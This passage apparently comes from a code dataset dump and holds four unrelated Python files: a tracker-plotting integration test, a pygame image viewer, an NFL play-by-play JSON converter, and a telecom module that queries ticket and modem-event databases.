run(self):\n \"\"\"Continually updates detections\"\"\"\n loop_counter = 0\n while True:\n sleep(self.update_interval)\n\n # get tracks from map\n self.get_data()\n\n # plot tracks and detections on map\n self.plot_data()\n\n # update detections\n self.update_detections(loop_counter)\n\n if self.look_frame == 'aperture':\n # move aperture\n self.pan_aperture()\n\n loop_counter = (loop_counter + 1) % 4\n\n def update_detections(self, send_counter):\n \"\"\"Updates detections by random dr and dtheta\"\"\"\n # loop through detections\n for ii in range(len(self.epoch_frame)):\n # get dt\n dt = (time_in_millis() - self.prev_time[ii]) / 1000.\n # get rng and bearing rate\n rng_rate, bearing_rate = self.rng_rate_list[ii], self.bearing_rate_list[ii]\n\n # adjust bearing rate based on distance from origin\n bearing_rate /= 0.5* self.epoch_frame[ii][0]\n\n # generate deltas\n rand_dr = uniform(-0.01, 0.01)\n rand_dtheta = uniform(-0.001, 0.001)\n \n dr = (rand_dr + rng_rate) * dt\n dtheta = (rand_dtheta + bearing_rate) * dt\n\n # fix wraparound\n theta = self.epoch_frame[ii][1] + dtheta\n rng = self.epoch_frame[ii][0] + dr\n if theta > 180:\n theta = -180 + (theta % 180)\n\n if rng < 0:\n rng *= -1\n theta %= -180\n\n # update detection with deltas\n self.epoch_frame[ii] = (rng, theta, self.epoch_frame[ii][2])\n\n # set detections for plotting\n self.det_rng_data = [det[0] for det in self.epoch_frame]\n self.det_bearing_data = [det[1] for det in self.epoch_frame]\n self.det_type_data = [det[2] for det in self.epoch_frame]\n\n idx_list = [1] * len(self.epoch_frame)\n\n if self.look_frame == 'aperture':\n # trim epoch frame to objects in view look aperture\n for ii, obj in enumerate(self.epoch_frame):\n if not self.look_rng[0] <= obj[0] <= self.look_rng[1] or \\\n not self.look_bearing[0] <= obj[1] <= self.look_bearing[1]:\n idx_list[ii] = 0\n\n if self.detect_mode == 'random':\n # trim epoch frame using randint (to determine whether or not to send data)\n for ii in range(len(idx_list)):\n if randint(0, 9) >= (self.detect_probability * 10):\n idx_list[ii] = 0\n\n elif self.detect_mode == 'regular':\n if send_counter != 0:\n idx_list = [0] * len(idx_list)\n\n elif self.detect_mode == 'constant':\n pass\n\n epoch_frame = [obj for (ii, obj) in zip(idx_list, self.epoch_frame) if ii == 1 ]\n\n # update map with detections\n pub.sendMessage('object(s) detected', epoch_frame = epoch_frame, frame_bounds = self.frame_bounds)\n\n def spawn_detections(self, n_dets):\n \"\"\"\n Creates n_dets random detections and places on Map\n Inputs:\n n_dets -- number of detections to create\n \"\"\"\n # initialize epoch frame\n epoch_frame = [0] * n_dets\n\n # generate random detections\n for ii in range(n_dets):\n rand_rng = uniform(*self.frame_bounds[0])\n rand_bearing = uniform(*self.frame_bounds[1])\n rand_type = randint(0, 2)\n \n # place in epoch_frame\n epoch_frame[ii] = (rand_rng, rand_bearing, rand_type)\n\n # save off epoch_frame\n self.epoch_frame = epoch_frame\n\n def get_data(self):\n \"\"\"Gets data from map return_object function\"\"\"\n # get data\n data = self.map.return_objects(bearingRange=[-180, 180], rngRange=[0, 200])\n\n # split data into rng, bearing, and type_data\n self.track_rng_data = [obj[0] for obj in data]\n self.track_bearing_data = [obj[1] for obj in data]\n self.track_type_data = [obj[2] for obj in data]\n self.track_conf_data = [obj[5] for obj in data]\n\n def plot_data(self):\n \"\"\"Updates plot using data\"\"\"\n # update tracks data\n 
self.draw_covar_ellipses(self._deg_2_rad(self.track_bearing_data), self.track_rng_data, self.track_conf_data)\n\n # update look aperture\n self.draw_look_aperture()\n\n # update detections data\n self.dets.set_offsets([*zip(self._deg_2_rad(self.det_bearing_data), self.det_rng_data)])\n\n # restore background (blitting)\n self.fig.canvas.restore_region(self.background)\n\n # draw tracks and dets\n for ellipse in self.covar_ellipses:\n self.polar.draw_artist(ellipse)\n self.polar.draw_artist(self.dets)\n\n # draw look aperture\n for line in self.look_apertures:\n self.polar.draw_artist(line[0])\n\n self.fig.canvas.blit(self.polar.bbox)\n\n self.fig.canvas.flush_events()\n\n for ii, track_conf in enumerate(self.track_conf_data):\n print(\"Track {}: confidence -- {}\".format(ii, track_conf))\n print(\"Track List Length: {}\".format(len(self.track_conf_data)))\n print('-------------------------------------------------------')\n\n def pan_aperture(self):\n \"\"\"\n Pans look aperture\n Side effects:\n self.look_bearing -- pans look bearing (at 0.5 deg per step)\n \"\"\"\n bearing_rate = 0.5\n aperture_center = sum(self.look_bearing) / 2.\n new_ap_center = aperture_center + (bearing_rate * self.pan_direction)\n\n if new_ap_center > self.look_sweep[1]:\n new_ap_center = self.look_sweep[1] - (new_ap_center % self.look_sweep[1])\n self.pan_direction *= -1\n elif new_ap_center < self.look_sweep[0]:\n new_ap_center = self.look_sweep[0] - (new_ap_center % self.look_sweep[0])\n self.pan_direction *= -1\n\n diff = new_ap_center - aperture_center\n self.look_bearing = tuple(bear + diff for bear in self.look_bearing[:])\n\n def draw_look_aperture(self):\n \"\"\"\n Draws look aperture\n Side Effects:\n self.look_apertures -- changes look aperture to reflect new look direction\n \"\"\"\n # remove old aperture from plot\n for artist in self.look_apertures:\n self.polar.lines.remove(artist[0])\n\n # re-init look_apertures list\n self.look_apertures = [0] * 3\n\n # create wedge\n rad_look_bearing = self._deg_2_rad(self.look_bearing)\n self.look_apertures[0] = self.polar.plot([rad_look_bearing[0]] * 2, [self.look_rng[0], self.look_rng[1]], \\\n '--', color = 'g', alpha = 0.6)\n self.look_apertures[1] = self.polar.plot([rad_look_bearing[1]] * 2, [self.look_rng[0], self.look_rng[1]], \\\n '--', color = 'g', alpha = 0.6)\n bearing_sweep = np.arange(rad_look_bearing[0], rad_look_bearing[1], (rad_look_bearing[1] - rad_look_bearing[0]) / 100.)\n self.look_apertures[2] = self.polar.plot(bearing_sweep, [self.look_rng[1]] * 100, \\\n '--', color = 'g', alpha = 0.6)\n\n for aperture in self.look_apertures:\n self.polar.add_artist(aperture[0])\n\n def draw_covar_ellipses(self, track_bearing_data, track_rng_data, track_conf_data):\n \"\"\"\n Draws covariance ellipses for each track\n Inputs:\n track_bearing_data -- list of track bearings (in rad)\n track_rng_data -- list of track ranges\n track_conf_data -- list of track confidences\n Side Effects:\n self.covar_ellipses -- sets list of covar ellipses to new origin, size\n \"\"\"\n # remove old ellipses from plot\n for artist in self.covar_ellipses:\n artist.remove()\n\n # re-init covar_ellipses list\n self.covar_ellipses = [0] * len(track_bearing_data)\n \n # generate ellipses for each track\n # NOTE: current method of getting covariances is a bit of hack... 
should create API to get covars in future\n for ii, (track_bearing, track_rng, track_conf) in enumerate(zip(track_bearing_data, track_rng_data, track_conf_data)):\n ellipse_center = (track_bearing, track_rng)\n ellipse_rng_radius = self.map.object_list[ii].kalman.covar[0, 0]\n ellipse_bearing_radius = np.radians(self.map.object_list[ii].kalman.covar[1, 1])\n ellipse_conf = track_conf\n if ellipse_conf > 0.7:\n color = 'green'\n elif ellipse_conf > 0.3:\n color = 'blue'\n else:\n color = 'red'\n\n alpha = 0.4\n\n self.covar_ellipses[ii] = Ellipse(ellipse_center, ellipse_bearing_radius, ellipse_rng_radius, \\\n angle = np.radians(track_bearing), alpha = alpha, color = color)\n\n self.polar.add_artist(self.covar_ellipses[ii])\n\n# print(\"Ellipse {}: {}\".format(ii, (ellipse_rng_radius, ellipse_bearing_radius)))\n\n def _deg_2_rad(self, data):\n \"\"\"Converts degrees to radians for plotting\"\"\"\n return [elem * (np.pi)/ 180. for elem in data]\n","sub_path":"integration_tests/tracking/tracker_integration_test.py","file_name":"tracker_integration_test.py","file_ext":"py","file_size_in_byte":12542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"235702753","text":"import pygame, sys\nfrom pygame.locals import *\n\npygame.init()\npokemon2 = raw_input('Enter a Pokemon name: ')\nstr(pokemon2)\npokemon1 = pokemon2 + '.png'\nprint(pokemon1)\nscreen = pygame.display.set_mode((475,475),0,32)\npokemon = pygame.image.load(pokemon1).convert_alpha()\n\nwhile True:\n\tfor event in pygame.event.get():\n\t\tif event.type == QUIT:\n\t\t\tpygame.quit()\n\t\t\tsys.exit()\n\tstatus = pygame.key.get_focused()\n\tif status == True:\n\t\tpygame.quit()\n\t\tsys.exit()\n\tscreen.blit(pokemon, (0,0))\n\tpygame.display.update()\n","sub_path":"pygame/pygame1.5.py","file_name":"pygame1.5.py","file_ext":"py","file_size_in_byte":512,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440364219","text":"import os\nimport json\nfrom pprint import pprint\nfrom pathlib import Path\nhome = str(Path.home())\nimport codecs\n\n\ndef convert_gsis_id(new_id):\n # 32013030-2d30-3032-3334-35395dc60da5\n # XXXX3030-2d30-3032-3334-3539XXXXXXXX\n # careful of odd one: 32030058-7973-2002-0202-020202020202020204e2f41\n # '00-0023459'\n return codecs.decode(new_id[4:-8].replace('-',''),\"hex\").decode('utf-8')\n\n\ndef pop_from_list_or_int(val):\n if type(val) == list:\n return val[0]\n else:\n return val\n\ndef parseTeam(gameDetail, team, old_team, result):\n if gameDetail[f'{team}PointsOvertime']:\n overtime = pop_from_list_or_int(gameDetail[f'{team}PointsOvertime'])\n else:\n overtime = 0\n\n result[f'{old_team}'] = {\n 'score': {\n \"1\": pop_from_list_or_int(gameDetail[f'{team}PointsQ1']),\n \"2\": pop_from_list_or_int(gameDetail[f'{team}PointsQ2']),\n \"3\": pop_from_list_or_int(gameDetail[f'{team}PointsQ3']),\n \"4\": pop_from_list_or_int(gameDetail[f'{team}PointsQ4']),\n \"5\": overtime,\n \"T\": pop_from_list_or_int(gameDetail[f'{team}PointsTotal']),\n },\n 'to': 0,\n 'abbr': pop_from_list_or_int(gameDetail[f'{team}Team'][f'abbreviation']),\n 'stats': {\n 'team': {\n \"totfd\": 0,\n \"totyds\": 0,\n \"pyds\": 0,\n \"ryds\": 0,\n \"pen\": 0,\n \"penyds\": 0,\n \"trnovr\": 0,\n \"pt\": 0,\n \"ptyds\": 0,\n \"ptavg\": 0,\n \"top\": \"00:00\"\n },\n },\n }\n\ndef convert_game_file(gameDetail, eid):\n result = {\n # Assume the game is always over\n \"weather\": None,\n \"media\": None,\n \"yl\": \"\",\n \"qtr\": \"Final\",\n 
\"note\": None,\n \"down\": 0,\n \"togo\": 0,\n \"redzone\": True,\n \"clock\": \"00:00\",\n \"posteam\": None, # Doesn't matter\n \"stadium\": None,\n \"scrsummary\": {}}\n\n parseTeam(gameDetail,'home', 'home', result)\n parseTeam(gameDetail,'visitor', 'away', result)\n drives = {}\n for i, drive in enumerate(gameDetail['drives']):\n drives[str(i)] = {\n 'posteam': 'SF',\n 'qtr': 1,\n 'redzone': True,\n 'fds': 0,\n 'result': 'Punt',\n 'penyds': 0,\n 'ydsgained': 0,\n 'numplays': 0,\n 'postime': '1:55',\n \"start\": {\n \"qtr\": 1,\n \"time\": \"15:00\",\n \"yrdln\": \"SF 25\",\n \"team\": \"SF\"\n },\n \"end\": {\n \"qtr\": 1,\n \"time\": \"13:05\",\n \"yrdln\": \"SF 34\",\n \"team\": \"SF\"\n },\n 'plays': {}\n }\n\n for play in file['data']['viewer']['gameDetail']['plays'][1:]:\n # if 'playType' not in play or play['playType'] in ['TIMEOUT', 'COMMENT']: # Doesn't contain driveSequenceNumber, and we don't need data for these.\n # continue\n try:\n new_play = {\n \"sp\": 0, # scoringPlay?\n \"qtr\": play['quarter'],\n \"down\": play['down'],\n \"time\": play[\"clockTime\"],\n \"yrdln\": play['yardLine'],\n \"ydstogo\": play['yardsToGo'],\n \"ydsnet\": play['driveNetYards'] if 'driveNetYards' in play else 0,\n \"desc\": play['playDescription'],\n \"note\": None,\n \"players\": {}\n }\n if ('possessionTeam.abbreviation' in play):\n new_play['posteam'] = play['possessionTeam.abbreviation']\n elif ('possessionTeam' in play and play['possessionTeam'] != None):\n new_play['posteam'] = play['possessionTeam']['abbreviation']\n else:\n new_play['posteam'] = ''\n\n # print(play['playDescription'])\n for sequence, stat in enumerate(play['playStats']):\n if 'playerName' in stat and stat['playerName'] != 'Team' and stat['playerName'] != None:\n player_id = convert_gsis_id(stat['gsisPlayer.id'] if 'gsisPlayer.id' in stat else stat['gsisPlayer']['id'])\n # print(f'{player_id} - {stat[\"playerName\"]}')\n if not player_id in new_play['players']:\n new_play['players'][player_id] = []\n new_play['players'][player_id].append({\n \"sequence\": sequence,\n \"clubcode\": stat['team.abbreviation'] if 'team.abbreviation' in stat else stat['team']['abbreviation'],\n \"playerName\": stat['playerName'],\n \"statId\": stat['statId'],\n \"yards\": stat['yards'],\n })\n else:\n new_play['players'][0] = [{\n \"sequence\": sequence,\n \"clubcode\": stat['team.abbreviation'] if 'team.abbreviation' in stat else stat['team']['abbreviation'],\n \"playerName\": None,\n \"statId\": stat['statId'],\n \"yards\": stat['yards'],\n }]\n if play['driveSequenceNumber'] == None:\n print(\"Empty driveSequenceNumber:\")\n print(new_play)\n else:\n drives[str(play['driveSequenceNumber']-1)]['plays'][play['playId']] = new_play\n except Exception as e:\n # print(play['playerName'])\n # print(play['playType'])\n print(e)\n # print(e)\n # print(e.args)\n # print(play)\n quit()\n\n result['drives'] = drives\n result = {\n eid: result\n }\n filename = f'../nflgame/gamecenter-json/{eid}.json'\n json.dump(result, open(filename, 'w'))\n os.system(f'gzip -f {filename}')\n\nschedule = json.load(open(f'../nflgame/schedule.json'))\n\n# for game in schedule['games']:\n# year = game[1]['year']\n# home = game[1]['home']\n# away = game[1]['away']\n# week = game[1]['week']\n# if year == 2019 and week == 1 and game[1]['season_type'] == 'REG':\n# print(game[0])\n# # print(game)\n# file = json.load(open(f'nflfastR-raw-master/raw/{year}/{year}_{str(week).zfill(2)}_{away}_{home}.json', 'r'))\n# gameDetail = file['data']['viewer']['gameDetail']\n# # 
print(gameDetail)\n# convert_game_file(gameDetail, game[0])\n# file = json.load(open(f'nflfastR-raw-master/raw/2019/2019_01_ATL_MIN.json', 'r'))\n\nfor game in schedule['games']:\n year = game[1]['year']\n home = game[1]['home']\n away = game[1]['away']\n week = game[1]['week']\n if year == 2021 and week == 3 and game[1]['season_type'] == 'REG':\n print(game[0])\n file = json.load(open(f'nflfastR-raw-master/raw/{year}/{year}_REG_{str(week).zfill(2)}_{away}_{home}.json', 'r'))\n gameDetail = file['data']['viewer']['gameDetail']\n # print(gameDetail)\n convert_game_file(gameDetail, game[0])\n\n\n# file = json.load(open(f'nflfastR-raw-master/raw/2021/2021_01_PHI_NE.json', 'r'))\n# gameDetail = file['data']['viewer']['gameDetail']\n# convert_game_file(gameDetail, '2021081901')\n","sub_path":"scrape/play-by-play.py","file_name":"play-by-play.py","file_ext":"py","file_size_in_byte":7294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"239956008","text":"#!/usr/bin/env python2.7\r\n# -*- coding: utf-8 -*-\r\n\r\n# ------------------------------------------------------------------------------\r\n# Copyright (c) 2012-2013 Kabel Deutschland Vertrieb und Services GmbH (KDG)\r\n# This software is the proprietary information of KDG.\r\n# All Right Reserved.\r\n# ------------------------------------------------------------------------------\r\n\r\nimport collections\r\nimport logging\r\nimport datetime\r\nimport random\r\nimport time\r\nimport topology\r\nimport Queue\r\nimport thread\r\nimport sys\r\n\r\nimport netcam_config\r\nimport alertTexter\r\nlogger = logging.getLogger('modules.rawdata')\r\n\r\nLIBRARY_MODE = netcam_config.environment['library_mode']\r\n\r\nif not LIBRARY_MODE:\r\n import ibm_db\r\n import oracle\r\n\r\n\r\nclass Datapoint(collections.namedtuple('Datapoint',\r\n ['data',\r\n 'value',\r\n 'starttime',\r\n 'stoptime',\r\n 'node_name'])):\r\n \"\"\"\r\n A Namedtuple storing all information related to measured data.\r\n\r\n :var data: a Namedtuple containing further data\r\n :var value: the value of the *datapoint*\r\n :var starttime: the starttime where the *datapoint* is valid\r\n :var stoptime: the stoptime where the *datapoint* stops being valid\r\n :var node_name: the name of the :py:class:`~lib.modules.topology.Node` where the *datapoint* was generated\r\n \"\"\"\r\n pass\r\n\r\n\r\nclass Ticketdata(collections.namedtuple('Ticketdata',\r\n ['nr',\r\n 'id',\r\n 'zustand',\r\n 'klasse',\r\n 'dienst',\r\n 'annahme',\r\n 'abschluss',\r\n 'soll_von',\r\n 'soll_bis',\r\n 'stoer_von',\r\n 'stoer_bis',\r\n 'st1',\r\n 'st2',\r\n 'st3_st3',\r\n 'st3_zus',\r\n 'bemerkung',\r\n 'fehler',\r\n 'ergebnis',\r\n 'auftragsart',\r\n 'orgetyp',\r\n 'NE'])):\r\n \"\"\"\r\n A Namedtuple storing all information related to Ticket data.\r\n\r\n :var nr: A_Auftragsnr\r\n :var id: A_auftragseinheit_id\r\n :var zustand: A_bearbeitungszustand\r\n :var klasse: A_Auftragsklasse\r\n :var dienst: A_dienstkategorie\r\n :var ammahme: A_annehmezeitpunkt\r\n :var abschluss: A_Abschlusszeitpunkt\r\n :var soll_von: A_soll_von\r\n :var soll_bis: A_soll_bis\r\n :var stoer_von: A_stoer_von\r\n :var stoer_bis: A_stoer_bis\r\n :var st1: A_Auftragsbeschreibung_st1\r\n :var st2: A_Auftragsbeschreibung_st2\r\n :var st3_st3: ST3_ST3_Auftragsbeschreibung_max\r\n :var st3_zus: ST3_ZUS_Auftragsbeschreibung_max\r\n :var bemerkung: A_ref_BEM_bemerkung_max\r\n :var fehler: Ref_Fehlerursache\r\n :var ergebnis: Ref_Abschlussergebnis\r\n \"\"\"\r\n pass\r\n\r\n\r\nTEMP_TABLE = 
\"temp_rawdata\"\r\nTEMP_TABLE_CREATE_SQL = \"\"\"\r\nCREATE TABLE {}\r\n (\r\n nodename VARCHAR2(100)\r\n )\r\n\"\"\"\r\n\r\nTEMP_TABLE_IDX_SQL = \"\"\"\r\nCREATE INDEX IX{} on {}\r\n (\r\n nodename\r\n )\r\n\"\"\"\r\n\r\nDELPHI_CONNSTRING_DATA = (\"DATABASE={};HOSTNAME={};PORT={};PROTOCOL=TCPIP;UID={user};PWD={passwd};\"\r\n \"\".format('{}', '{}', '{}', user=netcam_config.delphi_db_data['user'],\r\n passwd=netcam_config.delphi_db_data['password']))\r\n\r\n\r\nDELPHI_REGIONS_DATA = netcam_config.delphi_regions_data\r\n\r\nDELPHI_CONNSTRING_PROCESS = (\"DATABASE={};HOSTNAME={};PORT={};PROTOCOL=TCPIP;UID={user};PWD={passwd};\"\r\n \"\".format('{}', '{}', '{}', user=netcam_config.delphi_db_process['user'],\r\n passwd=netcam_config.delphi_db_process['password']))\r\n\r\n\r\nDELPHI_REGIONS_PROCESS = netcam_config.delphi_regions_process\r\n\r\n\r\nGAPS_TABLE = 'gaps'\r\n\r\nGAPS_CREATE_SQL = \"\"\"\r\nCREATE TABLE {}\r\n (\r\n datakind VARCHAR2(50),\r\n gapstart DATE,\r\n gapend DATE\r\n )\r\n\r\n\"\"\".format(GAPS_TABLE)\r\n\r\nif not LIBRARY_MODE:\r\n oracle_db2 = oracle.Oracle()\r\n\r\n if not oracle_db2.exists_table(GAPS_TABLE):\r\n oracle_db2.executeSQL(GAPS_CREATE_SQL)\r\n del oracle_db2\r\n\r\n\r\ndef get_modems(t_interval, nodes):\r\n hierarchy = \"MAC\"\r\n return get_hierarchy_members(nodes, hierarchy)\r\n\r\n\r\ndef get_customers(t_interval, nodes):\r\n hierarchy = \"Kunde\"\r\n return get_hierarchy_members(nodes, hierarchy)\r\n\r\n\r\ndef get_hierarchy_members(nodes, hierarchy):\r\n data = []\r\n if nodes == 'all':\r\n pass\r\n topology = nodes[0].topology\r\n hierarchy = topology.hierarchy_names.index(hierarchy)\r\n for node in nodes:\r\n if node.hierarchy == hierarchy:\r\n data.append(Datapoint(None,\r\n node.name,\r\n datetime.datetime.now(),\r\n datetime.datetime.now(),\r\n node.name))\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\ndef get_lower_nodes_of_tickets(ticket_number_ints):\r\n result = collections.defaultdict(list)\r\n live_sql = u\"\"\"\r\nSELECT a_auftrag_id, a_typ, a_duvt_ref_id as found\r\nFROM ta_auftrag_netzdaten_duvt\r\nWHERE a_auftrag_id in ({ticket_number_ints})\r\n\"\"\"\r\n live_sql = live_sql.format(ticket_number_ints=','.join([str(i) for i in ticket_number_ints]))\r\n data = set(_fetch_with_spiegel(live_sql, kind='process'))\r\n for entry in data:\r\n ticket_number_int = entry[0]\r\n node_type = entry[1].strip()\r\n node_id = entry[2]\r\n if node_type == 'VzK':\r\n result[ticket_number_int].append('C-Linie R{} {}'.format(str(ticket_number_int)[0], node_id))\r\n if node_type == u'ÜP':\r\n result[ticket_number_int].append('UEP R{} {}'.format(str(ticket_number_int)[0], node_id))\r\n return result\r\n\r\ndef get_onoff(t_interval, nodes):\r\n static_sql = u\"\"\"\r\nSELECT case when cablemodem_status = 1 then 'OFF'\r\n when cablemodem_status = 12 then 'ON' else NULL END AS value\r\n ,created AS starttime\r\n ,created AS stoptime\r\n ,'MAC ' || cablemodem_mac AS node_name\r\nFROM netcam_cm_onoff_events\r\nWHERE created >= To_date('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n AND created < To_date('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n\"\"\"\r\n static_nodessql = u\"AND 'MAC ' || cablemodem_mac in ({nodes}) \"\r\n data_format = lambda: None\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"), t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n oracle_db = oracle.Oracle()\r\n static_data = []\r\n\r\n if static_interval:\r\n logger.info('Fetching from static database.')\r\n table = None\r\n if nodes != 'all':\r\n nodes = [node 
for node in nodes if node.name[0:3] == \"MAC\"]\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n static_sql = static_sql.format(start=static_interval[0], stop=static_interval[1])\r\n if t_interval[1] > datetime.datetime.now() - datetime.timedelta(seconds=60):\r\n try:\r\n oracle_db.executeSQL('select netcam_cm_onoff_events_upd_tme() from dual')\r\n except:\r\n logger.warning(alertTexter.alertText(13010))\r\n static_data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(static_data, data_format)\r\n\r\n data = static_data\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\ndef sx_in_unit(unit, region):\r\n live_sql = u\"\"\"\r\nSELECT count(1) as found\r\nFROM ta_auftrag_kopfdaten\r\nWHERE a_auftragseinheit_id = {unit}\r\nAND a_auftragsklasse = 'SX'\r\n\"\"\"\r\n live_sql = live_sql.format(unit=unit)\r\n result = _fetch_with_spiegel(live_sql, assoc=True, region=region, kind='process')\r\n if result:\r\n result = result[0]\r\n return result\r\n\r\ndef get_single_ticket(ticketnumber):\r\n live_sql = u\"\"\"\r\nSELECT a_auftrnr as nr\r\n ,a_auftrag_id as tick_id\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt AS abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,A_AUFTR_IN_DISPO AS a_auftr_in_dispo\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\nFROM ta_auftrag_kopfdaten\r\n \"\"\"\r\n if not isinstance(ticketnumber, int) and '/' in ticketnumber:\r\n live_sql += \" where a_auftrnr = '{}'\".format(ticketnumber)\r\n region = int(ticketnumber[2])\r\n else:\r\n live_sql += \" where a_auftrag_id = {}\".format(ticketnumber)\r\n region = int((str(ticketnumber)[0]))\r\n result = _fetch_with_spiegel(live_sql, assoc=True, region=region, kind='process')\r\n if result:\r\n result = result[0]\r\n return result\r\n\r\n\r\ndef get_mgt_tickets_live(t_interval, nodes, live_period=4):\r\n live_period = datetime.timedelta(days=live_period)\r\n static_sql = u\"\"\"\r\n SELECT a_auftrnr as nr\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt AS abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,ST3_ST3_AUFTRBESCHREIBUNG_MAX AS st3_st3\r\n ,ST3_ZUS_AUFTRBESCHREIBUNG_MAX AS st3_zus\r\n ,NULL AS bemerkung\r\n ,REF_FEHLERURSACHE AS fehler\r\n ,REF_ABSCHLUSSERGEBNIS AS ergebnis\r\n ,A_AUFTRAGSART AS AUFTRAGSART\r\n ,A_ORGETYP AS ORGETYP\r\n ,A_NETZEBENE as NE\r\n ,a_auftrag_id AS value\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\n ,'VRP R' || region || 
' ' || an_bk_netzelem_id AS node_name\r\nFROM netcam_tickets\r\nWHERE a_auftragsklasse IN (\r\n 'CH'\r\n ,'SD'\r\n ,'SM'\r\n ,'SX'\r\n )\r\n AND A_STOERUNG_VON >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n AND (\r\n CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END IS NULL\r\n OR CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END < TO_DATE('{stop}', 'dd.mm.yyyy hh24:mi:ss')\r\n )\r\n AND an_bk_netzelem_id IS NOT NULL\r\n AND a_bearbeitungszustand != 'st'\r\n \"\"\"\r\n static_nodessql = \"AND 'VRP R' || region || ' ' || an_bk_netzelem_id in ({nodes})\"\r\n\r\n live_sql = u\"\"\"\r\nSELECT a_auftrnr as nr\r\n ,a_auftragseinheit_id AS id\r\n ,a_bearbeitungszustand AS zustand\r\n ,a_auftragsklasse AS klasse\r\n ,a_dienstkategorie AS dienst\r\n ,a_annahmezeitpunkt AS annahme\r\n ,a_abschlusszeitpunkt AS abschluss\r\n ,A_SOLLTERMIN_VON AS soll_von\r\n ,A_SOLLTERMIN_BIS AS soll_bis\r\n ,A_STOERUNG_VON AS stoer_von\r\n ,A_STOERUNG_BIS AS stoer_bis\r\n ,trim(a_auftragsbeschreibung_st1) AS st1\r\n ,trim(a_auftragsbeschreibung_st2) AS st2\r\n ,trim(a_auftragsbeschreibung_st3) AS st3_st3\r\n ,NULL::VARCHAR AS st3_zus\r\n ,NULL::VARCHAR AS bemerkung\r\n ,NULL::VARCHAR AS fehler\r\n ,NULL::VARCHAR AS ergebnis\r\n ,NULL::VARCHAR AS AUFTRAGSART\r\n ,NULL::VARCHAR AS ORGETYP\r\n ,NULL::VARCHAR AS NE\r\n ,tak.a_auftrag_id AS value\r\n ,A_STOERUNG_VON AS starttime\r\n ,CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END AS stoptime\r\n ,'VRP R' || '{region}' || ' ' || an.a_bk_netzelem_id AS node_name\r\nFROM ta_auftrag_kopfdaten tak\r\nLEFT JOIN ta_auftrag_netzdaten an\r\n ON tak.a_auftrag_id = an.a_auftrag_id\r\nWHERE a_auftragsklasse IN (\r\n 'CH'\r\n ,'SD'\r\n ,'SM'\r\n ,'SX'\r\n )\r\n AND A_STOERUNG_VON >= TO_DATE(\"{start}\", \"%d.%m.%Y %H:%M:%S\")\r\n AND (\r\n CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END IS NULL\r\n OR CASE\r\n WHEN A_STOERUNG_BIS IS NULL\r\n THEN a_abschlusszeitpunkt\r\n ELSE A_STOERUNG_BIS\r\n END < TO_DATE(\"{stop}\", \"%d.%m.%Y %H:%M:%S\")\r\n )\r\n AND an.a_bk_netzelem_id IS NOT NULL\r\n AND a_bearbeitungszustand != 'st'\r\n AND a_anzeige_in_ms_liste is not NULL\r\n AND a_anzeige_in_ms_liste != 'N'\r\n AND a_anzeige_in_ms_liste != 'O'\r\n AND (a_anbuendelung_deaktiviert is NULL or a_anbuendelung_deaktiviert != 'J')\r\n \"\"\"\r\n live_nodessql = \"AND 'VRP R' || '{region}' || ' ' || an.a_bk_netzelem_id in ({nodes})\"\r\n data_format = Ticketdata\r\n\r\n static_interval, live_interval = _split_live_static(t_interval[0], t_interval[1], live_period)\r\n oracle_db = oracle.Oracle()\r\n static_data = []\r\n live_data = []\r\n\r\n if static_interval:\r\n logger.info('Fetching from static database.')\r\n table = None\r\n if nodes != 'all':\r\n if len(nodes) 